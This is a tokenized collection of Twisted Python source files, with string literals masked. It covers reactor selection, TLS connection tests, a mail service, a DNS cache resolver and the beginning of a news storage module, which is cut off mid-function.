<s> """<STR_LIT>""" <EOL> from __future__ import division , absolute_import <EOL> __all__ = [ "<STR_LIT>" ] <EOL> from twisted . python . runtime import platform <EOL> def _getInstallFunction ( platform ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> if platform . isLinux ( ) : <EOL> try : <EOL> from twisted . internet . epollreactor import install <EOL> except ImportError : <EOL> from twisted . internet . pollreactor import install <EOL> elif platform . getType ( ) == '<STR_LIT>' and not platform . isMacOSX ( ) : <EOL> from twisted . internet . pollreactor import install <EOL> else : <EOL> from twisted . internet . selectreactor import install <EOL> except ImportError : <EOL> from twisted . internet . selectreactor import install <EOL> return install <EOL> install = _getInstallFunction ( platform ) </s>
<s> import sys <EOL> from twisted . python import modules <EOL> modules . theSystemPath = modules . PythonPath ( [ ] , moduleDict = { } ) <EOL> from twisted . internet import gireactor <EOL> for name in gireactor . _PYGTK_MODULES : <EOL> if sys . modules [ name ] is not None : <EOL> sys . stdout . write ( "<STR_LIT>" % <EOL> ( name , sys . modules [ "<STR_LIT>" ] ) ) <EOL> sys . exit ( <NUM_LIT:0> ) <EOL> try : <EOL> import gobject <EOL> except ImportError : <EOL> sys . stdout . write ( "<STR_LIT:success>" ) <EOL> else : <EOL> sys . stdout . write ( "<STR_LIT>" % ( gobject . __path__ , ) ) </s>
<s> """<STR_LIT>""" <EOL> from __future__ import division , absolute_import <EOL> __metaclass__ = type <EOL> from zope . interface import implementer <EOL> from twisted . python . compat import networkString <EOL> from twisted . python . filepath import FilePath <EOL> from twisted . internet . test . reactormixins import ReactorBuilder <EOL> from twisted . internet . protocol import ServerFactory , ClientFactory , Protocol <EOL> from twisted . internet . interfaces import ( <EOL> IReactorSSL , ITLSTransport , IStreamClientEndpoint ) <EOL> from twisted . internet . defer import Deferred , DeferredList <EOL> from twisted . internet . endpoints import ( <EOL> SSL4ServerEndpoint , SSL4ClientEndpoint , TCP4ClientEndpoint ) <EOL> from twisted . internet . error import ConnectionClosed <EOL> from twisted . internet . task import Cooperator <EOL> from twisted . trial . unittest import SkipTest <EOL> from twisted . python . runtime import platform <EOL> from twisted . internet . test . test_core import ObjectModelIntegrationMixin <EOL> from twisted . internet . test . test_tcp import ( <EOL> StreamTransportTestsMixin , AbortConnectionMixin ) <EOL> from twisted . internet . test . connectionmixins import ( <EOL> EndpointCreator , ConnectionTestsMixin , BrokenContextFactory ) <EOL> try : <EOL> from OpenSSL . crypto import FILETYPE_PEM <EOL> except ImportError : <EOL> FILETYPE_PEM = None <EOL> else : <EOL> from twisted . internet . ssl import PrivateCertificate , KeyPair <EOL> from twisted . internet . ssl import ClientContextFactory <EOL> class TLSMixin : <EOL> requiredInterfaces = [ IReactorSSL ] <EOL> if platform . isWindows ( ) : <EOL> msg = ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> skippedReactors = { <EOL> "<STR_LIT>" : msg , <EOL> "<STR_LIT>" : msg } <EOL> class ContextGeneratingMixin ( object ) : <EOL> import twisted <EOL> _pem = FilePath ( <EOL> networkString ( twisted . __file__ ) ) . sibling ( b"<STR_LIT:test>" ) . 
child ( b"<STR_LIT>" ) <EOL> del twisted <EOL> def getServerContext ( self ) : <EOL> """<STR_LIT>""" <EOL> pem = self . _pem . getContent ( ) <EOL> cert = PrivateCertificate . load ( <EOL> pem , KeyPair . load ( pem , FILETYPE_PEM ) , FILETYPE_PEM ) <EOL> return cert . options ( ) <EOL> def getClientContext ( self ) : <EOL> return ClientContextFactory ( ) <EOL> @ implementer ( IStreamClientEndpoint ) <EOL> class StartTLSClientEndpoint ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , wrapped , contextFactory ) : <EOL> self . wrapped = wrapped <EOL> self . contextFactory = contextFactory <EOL> def connect ( self , factory ) : <EOL> """<STR_LIT>""" <EOL> class WrapperFactory ( ServerFactory ) : <EOL> def buildProtocol ( wrapperSelf , addr ) : <EOL> protocol = factory . buildProtocol ( addr ) <EOL> def connectionMade ( orig = protocol . connectionMade ) : <EOL> protocol . transport . startTLS ( self . contextFactory ) <EOL> orig ( ) <EOL> protocol . connectionMade = connectionMade <EOL> return protocol <EOL> return self . wrapped . connect ( WrapperFactory ( ) ) <EOL> class StartTLSClientCreator ( EndpointCreator , ContextGeneratingMixin ) : <EOL> """<STR_LIT>""" <EOL> def server ( self , reactor ) : <EOL> """<STR_LIT>""" <EOL> return SSL4ServerEndpoint ( reactor , <NUM_LIT:0> , self . getServerContext ( ) ) <EOL> def client ( self , reactor , serverAddress ) : <EOL> """<STR_LIT>""" <EOL> return StartTLSClientEndpoint ( <EOL> TCP4ClientEndpoint ( <EOL> reactor , '<STR_LIT:127.0.0.1>' , serverAddress . port ) , <EOL> ClientContextFactory ( ) ) <EOL> class BadContextTestsMixin ( object ) : <EOL> """<STR_LIT>""" <EOL> def _testBadContext ( self , useIt ) : <EOL> """<STR_LIT>""" <EOL> reactor = self . buildReactor ( ) <EOL> exc = self . assertRaises ( <EOL> ValueError , useIt , reactor , BrokenContextFactory ( ) ) <EOL> self . assertEqual ( BrokenContextFactory . 
message , str ( exc ) ) <EOL> class StartTLSClientTestsMixin ( TLSMixin , ReactorBuilder , ConnectionTestsMixin ) : <EOL> """<STR_LIT>""" <EOL> endpoints = StartTLSClientCreator ( ) <EOL> class SSLCreator ( EndpointCreator , ContextGeneratingMixin ) : <EOL> """<STR_LIT>""" <EOL> def server ( self , reactor ) : <EOL> """<STR_LIT>""" <EOL> return SSL4ServerEndpoint ( reactor , <NUM_LIT:0> , self . getServerContext ( ) ) <EOL> def client ( self , reactor , serverAddress ) : <EOL> """<STR_LIT>""" <EOL> return SSL4ClientEndpoint ( <EOL> reactor , '<STR_LIT:127.0.0.1>' , serverAddress . port , <EOL> ClientContextFactory ( ) ) <EOL> class SSLClientTestsMixin ( TLSMixin , ReactorBuilder , ContextGeneratingMixin , <EOL> ConnectionTestsMixin , BadContextTestsMixin ) : <EOL> """<STR_LIT>""" <EOL> endpoints = SSLCreator ( ) <EOL> def test_badContext ( self ) : <EOL> """<STR_LIT>""" <EOL> def useIt ( reactor , contextFactory ) : <EOL> return reactor . connectSSL ( <EOL> "<STR_LIT:127.0.0.1>" , <NUM_LIT> , ClientFactory ( ) , contextFactory ) <EOL> self . _testBadContext ( useIt ) <EOL> def test_disconnectAfterWriteAfterStartTLS ( self ) : <EOL> """<STR_LIT>""" <EOL> class ShortProtocol ( Protocol ) : <EOL> def connectionMade ( self ) : <EOL> if not ITLSTransport . providedBy ( self . transport ) : <EOL> finished = self . factory . finished <EOL> self . factory . finished = None <EOL> finished . errback ( SkipTest ( "<STR_LIT>" ) ) <EOL> return <EOL> self . transport . startTLS ( self . factory . context ) <EOL> self . transport . write ( b"<STR_LIT:x>" ) <EOL> def dataReceived ( self , data ) : <EOL> self . transport . write ( b"<STR_LIT:y>" ) <EOL> self . transport . loseConnection ( ) <EOL> def connectionLost ( self , reason ) : <EOL> finished = self . factory . finished <EOL> if finished is not None : <EOL> self . factory . finished = None <EOL> finished . callback ( reason ) <EOL> reactor = self . 
buildReactor ( ) <EOL> serverFactory = ServerFactory ( ) <EOL> serverFactory . finished = Deferred ( ) <EOL> serverFactory . protocol = ShortProtocol <EOL> serverFactory . context = self . getServerContext ( ) <EOL> clientFactory = ClientFactory ( ) <EOL> clientFactory . finished = Deferred ( ) <EOL> clientFactory . protocol = ShortProtocol <EOL> clientFactory . context = self . getClientContext ( ) <EOL> clientFactory . context . method = serverFactory . context . method <EOL> lostConnectionResults = [ ] <EOL> finished = DeferredList ( <EOL> [ serverFactory . finished , clientFactory . finished ] , <EOL> consumeErrors = True ) <EOL> def cbFinished ( results ) : <EOL> lostConnectionResults . extend ( [ results [ <NUM_LIT:0> ] [ <NUM_LIT:1> ] , results [ <NUM_LIT:1> ] [ <NUM_LIT:1> ] ] ) <EOL> finished . addCallback ( cbFinished ) <EOL> port = reactor . listenTCP ( <NUM_LIT:0> , serverFactory , interface = '<STR_LIT:127.0.0.1>' ) <EOL> self . addCleanup ( port . stopListening ) <EOL> connector = reactor . connectTCP ( <EOL> port . getHost ( ) . host , port . getHost ( ) . port , clientFactory ) <EOL> self . addCleanup ( connector . disconnect ) <EOL> finished . addCallback ( lambda ign : reactor . stop ( ) ) <EOL> self . runReactor ( reactor ) <EOL> lostConnectionResults [ <NUM_LIT:0> ] . trap ( ConnectionClosed ) <EOL> lostConnectionResults [ <NUM_LIT:1> ] . trap ( ConnectionClosed ) <EOL> class TLSPortTestsBuilder ( TLSMixin , ContextGeneratingMixin , <EOL> ObjectModelIntegrationMixin , BadContextTestsMixin , <EOL> StreamTransportTestsMixin , ReactorBuilder ) : <EOL> """<STR_LIT>""" <EOL> def getListeningPort ( self , reactor , factory ) : <EOL> """<STR_LIT>""" <EOL> return reactor . listenSSL ( <NUM_LIT:0> , factory , self . getServerContext ( ) ) <EOL> def getExpectedStartListeningLogMessage ( self , port , factory ) : <EOL> """<STR_LIT>""" <EOL> return "<STR_LIT>" % ( factory , port . getHost ( ) . 
port ) <EOL> def getExpectedConnectionLostLogMsg ( self , port ) : <EOL> """<STR_LIT>""" <EOL> return "<STR_LIT>" % ( port . getHost ( ) . port , ) <EOL> def test_badContext ( self ) : <EOL> """<STR_LIT>""" <EOL> def useIt ( reactor , contextFactory ) : <EOL> return reactor . listenSSL ( <NUM_LIT:0> , ServerFactory ( ) , contextFactory ) <EOL> self . _testBadContext ( useIt ) <EOL> globals ( ) . update ( SSLClientTestsMixin . makeTestCaseClasses ( ) ) <EOL> globals ( ) . update ( StartTLSClientTestsMixin . makeTestCaseClasses ( ) ) <EOL> globals ( ) . update ( TLSPortTestsBuilder ( ) . makeTestCaseClasses ( ) ) <EOL> class AbortSSLConnectionTest ( ReactorBuilder , AbortConnectionMixin , ContextGeneratingMixin ) : <EOL> """<STR_LIT>""" <EOL> requiredInterfaces = ( IReactorSSL , ) <EOL> endpoints = SSLCreator ( ) <EOL> def buildReactor ( self ) : <EOL> reactor = ReactorBuilder . buildReactor ( self ) <EOL> try : <EOL> from twisted . protocols import tls <EOL> except ImportError : <EOL> return reactor <EOL> cooperator = Cooperator ( <EOL> scheduler = lambda x : reactor . callLater ( <NUM_LIT> , x ) ) <EOL> self . patch ( tls , "<STR_LIT>" , cooperator . cooperate ) <EOL> return reactor <EOL> def setUp ( self ) : <EOL> if FILETYPE_PEM is None : <EOL> raise SkipTest ( "<STR_LIT>" ) <EOL> globals ( ) . update ( AbortSSLConnectionTest . makeTestCaseClasses ( ) ) </s>
<s> """<STR_LIT>""" <EOL> from twisted . internet import defer <EOL> from twisted . application import service , internet <EOL> from twisted . python import util <EOL> from twisted . python import log <EOL> from twisted . cred . portal import Portal <EOL> from twisted . mail import protocols , smtp <EOL> import os <EOL> from zope . interface import implements , Interface <EOL> class DomainWithDefaultDict : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , domains , default ) : <EOL> """<STR_LIT>""" <EOL> self . domains = domains <EOL> self . default = default <EOL> def setDefaultDomain ( self , domain ) : <EOL> """<STR_LIT>""" <EOL> self . default = domain <EOL> def has_key ( self , name ) : <EOL> """<STR_LIT>""" <EOL> return <NUM_LIT:1> <EOL> def fromkeys ( klass , keys , value = None ) : <EOL> """<STR_LIT>""" <EOL> d = klass ( ) <EOL> for k in keys : <EOL> d [ k ] = value <EOL> return d <EOL> fromkeys = classmethod ( fromkeys ) <EOL> def __contains__ ( self , name ) : <EOL> """<STR_LIT>""" <EOL> return <NUM_LIT:1> <EOL> def __getitem__ ( self , name ) : <EOL> """<STR_LIT>""" <EOL> return self . domains . get ( name , self . default ) <EOL> def __setitem__ ( self , name , value ) : <EOL> """<STR_LIT>""" <EOL> self . domains [ name ] = value <EOL> def __delitem__ ( self , name ) : <EOL> """<STR_LIT>""" <EOL> del self . domains [ name ] <EOL> def __iter__ ( self ) : <EOL> """<STR_LIT>""" <EOL> return iter ( self . domains ) <EOL> def __len__ ( self ) : <EOL> """<STR_LIT>""" <EOL> return len ( self . domains ) <EOL> def __str__ ( self ) : <EOL> """<STR_LIT>""" <EOL> return '<STR_LIT>' % ( self . domains , ) <EOL> def __repr__ ( self ) : <EOL> """<STR_LIT>""" <EOL> return '<STR_LIT>' % ( self . domains , ) <EOL> def get ( self , key , default = None ) : <EOL> """<STR_LIT>""" <EOL> return self . domains . get ( key , default ) <EOL> def copy ( self ) : <EOL> """<STR_LIT>""" <EOL> return DomainWithDefaultDict ( self . domains . copy ( ) , self . 
default ) <EOL> def iteritems ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . domains . iteritems ( ) <EOL> def iterkeys ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . domains . iterkeys ( ) <EOL> def itervalues ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . domains . itervalues ( ) <EOL> def keys ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . domains . keys ( ) <EOL> def values ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . domains . values ( ) <EOL> def items ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . domains . items ( ) <EOL> def popitem ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . domains . popitem ( ) <EOL> def update ( self , other ) : <EOL> """<STR_LIT>""" <EOL> return self . domains . update ( other ) <EOL> def clear ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . domains . clear ( ) <EOL> def setdefault ( self , key , default ) : <EOL> """<STR_LIT>""" <EOL> return self . domains . setdefault ( key , default ) <EOL> class IDomain ( Interface ) : <EOL> """<STR_LIT>""" <EOL> def exists ( user ) : <EOL> """<STR_LIT>""" <EOL> def addUser ( user , password ) : <EOL> """<STR_LIT>""" <EOL> def getCredentialsCheckers ( ) : <EOL> """<STR_LIT>""" <EOL> class IAliasableDomain ( IDomain ) : <EOL> """<STR_LIT>""" <EOL> def setAliasGroup ( aliases ) : <EOL> """<STR_LIT>""" <EOL> def exists ( user , memo = None ) : <EOL> """<STR_LIT>""" <EOL> class BounceDomain : <EOL> """<STR_LIT>""" <EOL> implements ( IDomain ) <EOL> def exists ( self , user ) : <EOL> """<STR_LIT>""" <EOL> raise smtp . SMTPBadRcpt ( user ) <EOL> def willRelay ( self , user , protocol ) : <EOL> """<STR_LIT>""" <EOL> return False <EOL> def addUser ( self , user , password ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def getCredentialsCheckers ( self ) : <EOL> """<STR_LIT>""" <EOL> return [ ] <EOL> class FileMessage : <EOL> """<STR_LIT>""" <EOL> implements ( smtp . 
IMessage ) <EOL> def __init__ ( self , fp , name , finalName ) : <EOL> """<STR_LIT>""" <EOL> self . fp = fp <EOL> self . name = name <EOL> self . finalName = finalName <EOL> def lineReceived ( self , line ) : <EOL> """<STR_LIT>""" <EOL> self . fp . write ( line + '<STR_LIT:\n>' ) <EOL> def eomReceived ( self ) : <EOL> """<STR_LIT>""" <EOL> self . fp . close ( ) <EOL> os . rename ( self . name , self . finalName ) <EOL> return defer . succeed ( self . finalName ) <EOL> def connectionLost ( self ) : <EOL> """<STR_LIT>""" <EOL> self . fp . close ( ) <EOL> os . remove ( self . name ) <EOL> class MailService ( service . MultiService ) : <EOL> """<STR_LIT>""" <EOL> queue = None <EOL> domains = None <EOL> portals = None <EOL> aliases = None <EOL> smtpPortal = None <EOL> def __init__ ( self ) : <EOL> """<STR_LIT>""" <EOL> service . MultiService . __init__ ( self ) <EOL> self . domains = DomainWithDefaultDict ( { } , BounceDomain ( ) ) <EOL> self . portals = { } <EOL> self . monitor = FileMonitoringService ( ) <EOL> self . monitor . setServiceParent ( self ) <EOL> self . smtpPortal = Portal ( self ) <EOL> def getPOP3Factory ( self ) : <EOL> """<STR_LIT>""" <EOL> return protocols . POP3Factory ( self ) <EOL> def getSMTPFactory ( self ) : <EOL> """<STR_LIT>""" <EOL> return protocols . SMTPFactory ( self , self . smtpPortal ) <EOL> def getESMTPFactory ( self ) : <EOL> """<STR_LIT>""" <EOL> return protocols . ESMTPFactory ( self , self . smtpPortal ) <EOL> def addDomain ( self , name , domain ) : <EOL> """<STR_LIT>""" <EOL> portal = Portal ( domain ) <EOL> map ( portal . registerChecker , domain . getCredentialsCheckers ( ) ) <EOL> self . domains [ name ] = domain <EOL> self . portals [ name ] = portal <EOL> if self . aliases and IAliasableDomain . providedBy ( domain ) : <EOL> domain . setAliasGroup ( self . aliases ) <EOL> def setQueue ( self , queue ) : <EOL> """<STR_LIT>""" <EOL> self . 
queue = queue <EOL> def requestAvatar ( self , avatarId , mind , * interfaces ) : <EOL> """<STR_LIT>""" <EOL> if smtp . IMessageDelivery in interfaces : <EOL> a = protocols . ESMTPDomainDelivery ( self , avatarId ) <EOL> return smtp . IMessageDelivery , a , lambda : None <EOL> raise NotImplementedError ( ) <EOL> def lookupPortal ( self , name ) : <EOL> """<STR_LIT>""" <EOL> return self . portals [ name ] <EOL> def defaultPortal ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . portals [ '<STR_LIT>' ] <EOL> class FileMonitoringService ( internet . TimerService ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self ) : <EOL> """<STR_LIT>""" <EOL> self . files = [ ] <EOL> self . intervals = iter ( util . IntervalDifferential ( [ ] , <NUM_LIT> ) ) <EOL> def startService ( self ) : <EOL> """<STR_LIT>""" <EOL> service . Service . startService ( self ) <EOL> self . _setupMonitor ( ) <EOL> def _setupMonitor ( self ) : <EOL> """<STR_LIT>""" <EOL> from twisted . internet import reactor <EOL> t , self . index = self . intervals . next ( ) <EOL> self . _call = reactor . callLater ( t , self . _monitor ) <EOL> def stopService ( self ) : <EOL> """<STR_LIT>""" <EOL> service . Service . stopService ( self ) <EOL> if self . _call : <EOL> self . _call . cancel ( ) <EOL> self . _call = None <EOL> def monitorFile ( self , name , callback , interval = <NUM_LIT:10> ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> mtime = os . path . getmtime ( name ) <EOL> except : <EOL> mtime = <NUM_LIT:0> <EOL> self . files . append ( [ interval , name , callback , mtime ] ) <EOL> self . intervals . addInterval ( interval ) <EOL> def unmonitorFile ( self , name ) : <EOL> """<STR_LIT>""" <EOL> for i in range ( len ( self . files ) ) : <EOL> if name == self . files [ i ] [ <NUM_LIT:1> ] : <EOL> self . intervals . removeInterval ( self . files [ i ] [ <NUM_LIT:0> ] ) <EOL> del self . files [ i ] <EOL> break <EOL> def _monitor ( self ) : <EOL> """<STR_LIT>""" <EOL> self . _call = None <EOL> if self . 
index is not None : <EOL> name , callback , mtime = self . files [ self . index ] [ <NUM_LIT:1> : ] <EOL> try : <EOL> now = os . path . getmtime ( name ) <EOL> except : <EOL> now = <NUM_LIT:0> <EOL> if now > mtime : <EOL> log . msg ( "<STR_LIT>" % ( name , ) ) <EOL> self . files [ self . index ] [ <NUM_LIT:3> ] = now <EOL> callback ( name ) <EOL> self . _setupMonitor ( ) </s>
<s> """<STR_LIT>""" <EOL> from __future__ import division , absolute_import <EOL> from twisted . names import dns , common <EOL> from twisted . python import failure , log <EOL> from twisted . internet import defer <EOL> class CacheResolver ( common . ResolverBase ) : <EOL> """<STR_LIT>""" <EOL> cache = None <EOL> def __init__ ( self , cache = None , verbose = <NUM_LIT:0> , reactor = None ) : <EOL> common . ResolverBase . __init__ ( self ) <EOL> self . cache = { } <EOL> self . verbose = verbose <EOL> self . cancel = { } <EOL> if reactor is None : <EOL> from twisted . internet import reactor <EOL> self . _reactor = reactor <EOL> if cache : <EOL> for query , ( seconds , payload ) in cache . items ( ) : <EOL> self . cacheResult ( query , payload , seconds ) <EOL> def __setstate__ ( self , state ) : <EOL> self . __dict__ = state <EOL> now = self . _reactor . seconds ( ) <EOL> for ( k , ( when , ( ans , add , ns ) ) ) in self . cache . items ( ) : <EOL> diff = now - when <EOL> for rec in ans + add + ns : <EOL> if rec . ttl < diff : <EOL> del self . cache [ k ] <EOL> break <EOL> def __getstate__ ( self ) : <EOL> for c in self . cancel . values ( ) : <EOL> c . cancel ( ) <EOL> self . cancel . clear ( ) <EOL> return self . __dict__ <EOL> def _lookup ( self , name , cls , type , timeout ) : <EOL> now = self . _reactor . seconds ( ) <EOL> q = dns . Query ( name , type , cls ) <EOL> try : <EOL> when , ( ans , auth , add ) = self . cache [ q ] <EOL> except KeyError : <EOL> if self . verbose > <NUM_LIT:1> : <EOL> log . msg ( '<STR_LIT>' + repr ( name ) ) <EOL> return defer . fail ( failure . Failure ( dns . DomainError ( name ) ) ) <EOL> else : <EOL> if self . verbose : <EOL> log . msg ( '<STR_LIT>' + repr ( name ) ) <EOL> diff = now - when <EOL> try : <EOL> result = ( <EOL> [ dns . RRHeader ( r . name . name , r . type , r . cls , r . ttl - diff , <EOL> r . payload ) for r in ans ] , <EOL> [ dns . RRHeader ( r . name . name , r . type , r . cls , r . ttl - diff , <EOL> r . 
payload ) for r in auth ] , <EOL> [ dns . RRHeader ( r . name . name , r . type , r . cls , r . ttl - diff , <EOL> r . payload ) for r in add ] ) <EOL> except ValueError : <EOL> return defer . fail ( failure . Failure ( dns . DomainError ( name ) ) ) <EOL> else : <EOL> return defer . succeed ( result ) <EOL> def lookupAllRecords ( self , name , timeout = None ) : <EOL> return defer . fail ( failure . Failure ( dns . DomainError ( name ) ) ) <EOL> def cacheResult ( self , query , payload , cacheTime = None ) : <EOL> """<STR_LIT>""" <EOL> if self . verbose > <NUM_LIT:1> : <EOL> log . msg ( '<STR_LIT>' % query ) <EOL> self . cache [ query ] = ( cacheTime or self . _reactor . seconds ( ) , payload ) <EOL> if query in self . cancel : <EOL> self . cancel [ query ] . cancel ( ) <EOL> s = list ( payload [ <NUM_LIT:0> ] ) + list ( payload [ <NUM_LIT:1> ] ) + list ( payload [ <NUM_LIT:2> ] ) <EOL> if s : <EOL> m = s [ <NUM_LIT:0> ] . ttl <EOL> for r in s : <EOL> m = min ( m , r . ttl ) <EOL> else : <EOL> m = <NUM_LIT:0> <EOL> self . cancel [ query ] = self . _reactor . callLater ( m , self . clearEntry , query ) <EOL> def clearEntry ( self , query ) : <EOL> del self . cache [ query ] <EOL> del self . cancel [ query ] </s>
<s> """<STR_LIT>""" <EOL> import getpass , pickle , time , socket <EOL> import os <EOL> import StringIO <EOL> from hashlib import md5 <EOL> from email . Message import Message <EOL> from email . Generator import Generator <EOL> from zope . interface import implements , Interface <EOL> from twisted . news . nntp import NNTPError <EOL> from twisted . mail import smtp <EOL> from twisted . internet import defer <EOL> from twisted . enterprise import adbapi <EOL> from twisted . persisted import dirdbm <EOL> ERR_NOGROUP , ERR_NOARTICLE = range ( <NUM_LIT:2> , <NUM_LIT:4> ) <EOL> OVERVIEW_FMT = [ <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' <EOL> ] <EOL> def hexdigest ( md5 ) : <EOL> return '<STR_LIT>' . join ( map ( lambda x : hex ( ord ( x ) ) [ <NUM_LIT:2> : ] , md5 . digest ( ) ) ) <EOL> class Article : <EOL> def __init__ ( self , head , body ) : <EOL> self . body = body <EOL> self . headers = { } <EOL> header = None <EOL> for line in head . split ( '<STR_LIT:\r\n>' ) : <EOL> if line [ <NUM_LIT:0> ] in '<STR_LIT>' : <EOL> i = list ( self . headers [ header ] ) <EOL> i [ <NUM_LIT:1> ] += '<STR_LIT:\r\n>' + line <EOL> else : <EOL> i = line . split ( '<STR_LIT>' , <NUM_LIT:1> ) <EOL> header = i [ <NUM_LIT:0> ] . lower ( ) <EOL> self . headers [ header ] = tuple ( i ) <EOL> if not self . getHeader ( '<STR_LIT>' ) : <EOL> s = str ( time . time ( ) ) + self . body <EOL> id = hexdigest ( md5 ( s ) ) + '<STR_LIT:@>' + socket . gethostname ( ) <EOL> self . putHeader ( '<STR_LIT>' , '<STR_LIT>' % id ) <EOL> if not self . getHeader ( '<STR_LIT>' ) : <EOL> self . putHeader ( '<STR_LIT>' , str ( len ( self . body ) ) ) <EOL> if not self . getHeader ( '<STR_LIT>' ) : <EOL> self . putHeader ( '<STR_LIT>' , str ( self . body . count ( '<STR_LIT:\n>' ) ) ) <EOL> if not self . getHeader ( '<STR_LIT>' ) : <EOL> self . putHeader ( '<STR_LIT>' , time . ctime ( time . 
time ( ) ) ) <EOL> def getHeader ( self , header ) : <EOL> h = header . lower ( ) <EOL> if h in self . headers : <EOL> return self . headers [ h ] [ <NUM_LIT:1> ] <EOL> else : <EOL> return '<STR_LIT>' <EOL> def putHeader ( self , header , value ) : <EOL> self . headers [ header . lower ( ) ] = ( header , value ) <EOL> def textHeaders ( self ) : <EOL> headers = [ ] <EOL> for i in self . headers . values ( ) : <EOL> headers . append ( '<STR_LIT>' % i ) <EOL> return '<STR_LIT:\r\n>' . join ( headers ) + '<STR_LIT:\r\n>' <EOL> def overview ( self ) : <EOL> xover = [ ] <EOL> for i in OVERVIEW_FMT : <EOL> xover . append ( self . getHeader ( i ) ) <EOL> return xover <EOL> class NewsServerError ( Exception ) : <EOL> pass <EOL> class INewsStorage ( Interface ) : <EOL> """<STR_LIT>""" <EOL> def listRequest ( ) : <EOL> """<STR_LIT>""" <EOL> def subscriptionRequest ( ) : <EOL> """<STR_LIT>""" <EOL> def postRequest ( message ) : <EOL> """<STR_LIT>""" <EOL> def overviewRequest ( ) : <EOL> """<STR_LIT>""" <EOL> def xoverRequest ( group , low , high ) : <EOL> """<STR_LIT>""" <EOL> def xhdrRequest ( group , low , high , header ) : <EOL> """<STR_LIT>""" <EOL> def listGroupRequest ( group ) : <EOL> """<STR_LIT>""" <EOL> def groupRequest ( group ) : <EOL> """<STR_LIT>""" <EOL> def articleExistsRequest ( id ) : <EOL> """<STR_LIT>""" <EOL> def articleRequest ( group , index , id = None ) : <EOL> """<STR_LIT>""" <EOL> def headRequest ( group , index ) : <EOL> """<STR_LIT>""" <EOL> def bodyRequest ( group , index ) : <EOL> """<STR_LIT>""" <EOL> class NewsStorage : <EOL> """<STR_LIT>""" <EOL> def listRequest ( self ) : <EOL> raise NotImplementedError ( ) <EOL> def subscriptionRequest ( self ) : <EOL> raise NotImplementedError ( ) <EOL> def postRequest ( self , message ) : <EOL> raise NotImplementedError ( ) <EOL> def overviewRequest ( self ) : <EOL> return defer . 
succeed ( OVERVIEW_FMT ) <EOL> def xoverRequest ( self , group , low , high ) : <EOL> raise NotImplementedError ( ) <EOL> def xhdrRequest ( self , group , low , high , header ) : <EOL> raise NotImplementedError ( ) <EOL> def listGroupRequest ( self , group ) : <EOL> raise NotImplementedError ( ) <EOL> def groupRequest ( self , group ) : <EOL> raise NotImplementedError ( ) <EOL> def articleExistsRequest ( self , id ) : <EOL> raise NotImplementedError ( ) <EOL> def articleRequest ( self , group , index , id = None ) : <EOL> raise NotImplementedError ( ) <EOL> def headRequest ( self , group , index ) : <EOL> raise NotImplementedError ( ) <EOL> def bodyRequest ( self , group , index ) : <EOL> raise NotImplementedError ( ) <EOL> class _ModerationMixin : <EOL> """<STR_LIT>""" <EOL> sendmail = staticmethod ( smtp . sendmail ) <EOL> def notifyModerators ( self , moderators , article ) : <EOL> """<STR_LIT>""" <EOL> group = article . getHeader ( '<STR_LIT>' ) <EOL> subject = article . getHeader ( '<STR_LIT>' ) <EOL> if self . _sender is None : <EOL> sender = '<STR_LIT>' + socket . gethostname ( ) <EOL> else : <EOL> sender = self . _sender <EOL> msg = Message ( ) <EOL> msg [ '<STR_LIT>' ] = smtp . messageid ( ) <EOL> msg [ '<STR_LIT>' ] = sender <EOL> msg [ '<STR_LIT>' ] = '<STR_LIT:U+002CU+0020>' . join ( moderators ) <EOL> msg [ '<STR_LIT>' ] = '<STR_LIT>' % ( group , subject ) <EOL> msg [ '<STR_LIT:Content-Type>' ] = '<STR_LIT>' <EOL> payload = Message ( ) <EOL> for header , value in article . headers . values ( ) : <EOL> payload . add_header ( header , value ) <EOL> payload . set_payload ( article . body ) <EOL> msg . attach ( payload ) <EOL> out = StringIO . StringIO ( ) <EOL> gen = Generator ( out , False ) <EOL> gen . flatten ( msg ) <EOL> msg = out . getvalue ( ) <EOL> return self . sendmail ( self . 
_mailhost , sender , moderators , msg ) <EOL> class PickleStorage ( _ModerationMixin ) : <EOL> """<STR_LIT>""" <EOL> implements ( INewsStorage ) <EOL> sharedDBs = { } <EOL> def __init__ ( self , filename , groups = None , moderators = ( ) , <EOL> mailhost = None , sender = None ) : <EOL> """<STR_LIT>""" <EOL> self . datafile = filename <EOL> self . load ( filename , groups , moderators ) <EOL> self . _mailhost = mailhost <EOL> self . _sender = sender <EOL> def getModerators ( self , groups ) : <EOL> moderators = [ ] <EOL> for group in groups : <EOL> moderators . extend ( self . db [ '<STR_LIT>' ] . get ( group , None ) ) <EOL> return filter ( None , moderators ) <EOL> def listRequest ( self ) : <EOL> "<STR_LIT>" <EOL> l = self . db [ '<STR_LIT>' ] <EOL> r = [ ] <EOL> for i in l : <EOL> if len ( self . db [ i ] . keys ( ) ) : <EOL> low = min ( self . db [ i ] . keys ( ) ) <EOL> high = max ( self . db [ i ] . keys ( ) ) + <NUM_LIT:1> <EOL> else : <EOL> low = high = <NUM_LIT:0> <EOL> if self . db [ '<STR_LIT>' ] . has_key ( i ) : <EOL> flags = '<STR_LIT:m>' <EOL> else : <EOL> flags = '<STR_LIT:y>' <EOL> r . append ( ( i , high , low , flags ) ) <EOL> return defer . succeed ( r ) <EOL> def subscriptionRequest ( self ) : <EOL> return defer . succeed ( [ '<STR_LIT>' ] ) <EOL> def postRequest ( self , message ) : <EOL> cleave = message . find ( '<STR_LIT>' ) <EOL> headers , article = message [ : cleave ] , message [ cleave + <NUM_LIT:4> : ] <EOL> a = Article ( headers , article ) <EOL> groups = a . getHeader ( '<STR_LIT>' ) . split ( ) <EOL> xref = [ ] 